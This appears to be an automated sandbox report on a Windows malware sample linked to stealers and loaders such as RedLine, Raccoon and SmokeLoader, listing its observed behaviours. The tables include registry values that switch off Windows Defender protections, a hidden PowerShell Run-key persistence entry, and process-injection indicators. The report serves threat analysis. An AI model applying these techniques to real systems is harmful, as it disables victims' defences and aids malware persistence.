Analysis Overview
SHA256
6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f
Threat Level: Known bad
The file 6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Amadey
Raccoon Stealer payload
SmokeLoader
RedLine
RedLine payload
DcRat
ZGRat
Raccoon
Detect ZGRat V1
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies Windows Defender Real-time Protection settings
Glupteba
Drops file in Drivers directory
Modifies Windows Firewall
Stops running service(s)
Downloads MZ/PE file
Reads user/profile data of web browsers
Windows security modification
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Checks installed software on the system
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Drops file in Program Files directory
Checks for VirtualBox DLLs, possible anti-VM trick
Unsigned PE
Program crash
Enumerates physical storage devices
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Checks SCSI registry key(s)
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-10-26 07:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-10-26 07:45
Reported
2023-10-26 07:48
Platform
win10v2004-20231023-en
Max time kernel
97s
Max time network
154s
Command Line
Signatures
Amadey
DcRat
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
Raccoon
Raccoon Stealer payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
| PID 5568 created 3296 | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | C:\Windows\Explorer.EXE |
ZGRat
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\494E.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\65B1.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\71DA.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\4853.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\671A.exe'\"" | C:\Users\Admin\AppData\Local\Temp\671A.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\4532.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ML5UJ9UF.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SB7jI9jw.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rL2Jv7vH.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\iU3eD1eN.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3308 set thread context of 1248 | N/A | C:\Users\Admin\AppData\Local\Temp\6fff71e22472096a9504705dd57be5306efe418a44897afce0875aba7822a72f.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 4560 set thread context of 1460 | N/A | C:\Users\Admin\AppData\Local\Temp\71DA.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5012 set thread context of 4384 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fz10YT6.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
| PID 2196 set thread context of 5708 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Drive Tools\is-4GO6G.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-RG4N3.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-GASLU.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-OVD0C.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-TQ7L8.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CMG93.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-VOFQ5.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-PUR6E.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-8KQKH.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\zDriveTools.exe | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-CORJU.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-L77R1.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\Lang\is-DPVU5.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-P5FNF.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-9FQGU.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-MC0R6.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-8C67R.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-IAGSL.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Drive Tools\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-TAT27.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-OMPQI.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-B2UVK.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
| File created | C:\Program Files (x86)\Drive Tools\is-U7RVB.tmp | C:\Users\Admin\AppData\Local\Temp\is-9D0VB.tmp\LzmwAqmV.tmp | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune | C:\Users\Admin\AppData\Local\Temp\4A49.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1971 = "Belarus Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
